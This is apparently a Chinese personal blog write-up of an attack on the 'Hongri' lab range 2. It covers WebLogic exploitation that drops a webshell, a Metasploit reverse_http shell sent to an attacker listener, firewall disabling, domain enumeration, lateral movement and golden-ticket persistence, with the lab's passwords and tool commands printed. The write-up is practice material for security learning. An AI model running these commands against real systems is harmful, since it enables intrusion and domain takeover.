内网渗透——红日靶场二

目录

一、前期准备

DC机配置

PC机配置

WEB机配置

将PC机和WEB机的IP地址进行更改

 开启WEB服务

二、外网探测

1.使用nmap扫描

2.目录扫描

3.漏洞扫描

（1）CVE-2017-3506（getshell失败）

（2）CVE-2017-2725（msf）

三、内网渗透

1.信息收集

（1）关闭防火墙

（2）查看域信息

（3）查看域内IP

（4）定位域控及域管理员

 （5）查看域内主机

2.权限提升

 3.横向移动

4.权限维持

四、总结

---

一、前期准备

首先下好三个虚拟机

 然后配置一下网络，先添加一个VMnet2

然后给每个虚拟机配置一下网卡

DC机配置

账号：administrator

密码：1qaz@WSX

PC机配置

需要配置两张网卡，分别是NAT模式和内网域环境的仅主机模式

账号：mssql

密码：1qaz@WSX

WEB机配置

同样也是配置两张网卡

账号：Administrator/de1ay（在前期配置过程中可以用DE1AY/Administrator进行登录）

密码：1qaz@WSX

将PC机和WEB机的IP地址进行更改

由于我们的VMnet8（NAT）是192.168.57.x 网段的，而这两个机器的默认IP地址为192.168.111.x

所以这里将这两台机器的IP地址改一下：

两者进行IPV4的更改时，都需要输入管理员账号密码

账号：administrator

密码：1qaz@WSX

现在，几台机器的配置如下：

kali：192.168.57.128

PC：192.168.57.201    10.10.10.201

WEB：192.168.57.80   10.10.10.80

DC：10.10.10.10

 开启WEB服务

进入WEB机中

分别以管理员身份进行运行上面三个程序

二、外网探测

1.使用nmap扫描

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ce:f6:bc, IPv4: 192.168.57.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.57.1    00:50:56:c0:00:08       VMware, Inc.
192.168.57.2    00:50:56:ea:ad:e3       VMware, Inc.
192.168.57.80   00:0c:29:d6:09:a8       VMware, Inc.
192.168.57.201  00:0c:29:96:f1:a1       VMware, Inc.
192.168.57.254  00:50:56:e3:9e:a6       VMware, Inc.┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.57.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 19:57 CST
Nmap scan report for 192.168.57.80
Host is up (0.00046s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
7001/tcp  open  http          Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49183/tcp open  msrpc         Microsoft Windows RPC
49190/tcp open  msrpc         Microsoft Windows RPC
60966/tcp open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000; SP2

发现80端口和7001端口都是http服务，尝试访问一下，发现80端口没什么反应，反倒是7001端口有信息：显示有Weblogic Server 10.3.6.0

2.目录扫描

扫描一下该端口的目录，看看会不会有别的接口信息，使用dirmap进行扫描

成功显示页面

 这个时候可以看到一些信息了：Weblogic是Oracle的JAVA应用服务器，所以这里应该是Weblogic服务。尝试在百度上搜索其相关的漏洞利用工具

我更喜欢用类似WPScan那样的专门的扫描工具，发现了WeblogicScan,尝试用该工具进行扫描，在扫描的同时也可以去尝试会不会有默认账号密码

不过貌似还是密码被改掉了吗，再看看WeblogicScan的扫描结果

3.漏洞扫描

发现还是扫描到了两个漏洞的，问了下关于这两个漏洞的介绍，发现都是远程执行漏洞，那就一个个复现试试。（后续漏洞的原理肯定会再了解的，听说Weblogic的漏洞很多，很有学习的必要，到时候应该会一个个搭建复现一下，这里就直接利用了）

（1）CVE-2017-3506（getshell失败）

以下漏洞复现过程主要是采取这位师傅的文章：
weblogic wls-wsat组件gesilaVE-2017-3506）-CSDN博客

访问/wls-wsat/CoordinatorPortType11目录

如果出现这个页面的话，说明漏洞很可能存在，现在下载工具

工具地址：https://github.com/Al1ex/CVE-2017-3506

写入木马文件：

┌──(root㉿kali)-[~/POC/Weblogic/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.57.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp
[+] Success
[+] http://192.168.57.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami

 发现命令执行成功！但后面再尝试使用蚁剑连接时发现返回数据为空:

（2）CVE-2017-2725（msf）

搜索相关漏洞

配置攻击载荷

开始攻击

执行成功！

先让msf和cs联动一下，我更喜欢使用cs来进行操作

首先在cs上开启监听器

 然后在msf上设置shell转发

msf6 exploit(windows/local/payload_inject) > use exploit/windows/local/payload_inject
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.57.128
lhost => 192.168.57.128
msf6 exploit(windows/local/payload_inject) > set lport 80
lport => 80
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run

成功上线！

三、内网渗透

1.信息收集

（1）关闭防火墙

netsh advfirewall set allprofiles state off

（2）查看域信息

得到域名信息： de1ay.com 

而且可以得知该域应该是存在两个网段的，一个是 192.168.57.x 一个是10.10.10.x

（3）查看域内IP

arp -a

发现以下有用的IP地址：

192.168.57.201

10.10.10.10 （内网）

10.10.10.201 （内网）

（4）定位域控及域管理员

首先查看域控的主机名

beacon > shell net group "domain controllers" /domain

得到域控的主机名为DC，然后ping一下主机名来定位域控

发现域控是 10.10.10.10

还可以查看一下域管理员的名字：

beacon> net group "domain admins" /domain 

（5）查看域内主机

上面得到的IP还有一个是 10.10.10.201 不妨看一下其对应的主机名是什么

beacon> shell net group "domain computers" /domain

得到域内信息：
PC ：10.10.10.201

DC：10.10.10.10 Adminstrator

2.权限提升

将WEB机的权限提升到SYSTEM，直接尝试权限提升就行

 3.横向移动

通过提权的SYSTEM对10.10.10.x/24这个网段进行扫描（内网主机存活+端口扫描）

PC机：

DC机：

可以看到PC机和DC机都开了3389端口，尝试远程桌面登录（但都没有成功）

发现三台机子都开了445端口，在抓取了哈希之后尝试横向移动，先建立一个SMB监听

然后尝试横向移动到DC域控主机上

横向成功！

4.权限维持

创建黄金票据

其中的Domian SID可以这样获得：
 

这样就成功实现权限维持了！

四、总结

相较于第一次打红日靶场来说，感觉已经熟练了不少，之前的知识补充还是很有用的，虽然也许还存在一些问题，但慢慢来会让自己好受不少。写的部分还是有一些欠佳，而且今天在看之前写的文章的时候竟然发现有几篇文章被系统设为 V I P 可见了，真真是对不起给予我帮助的师傅们。

有问题的地方，还请各位斧正，希望能给我一些宝贵的意见！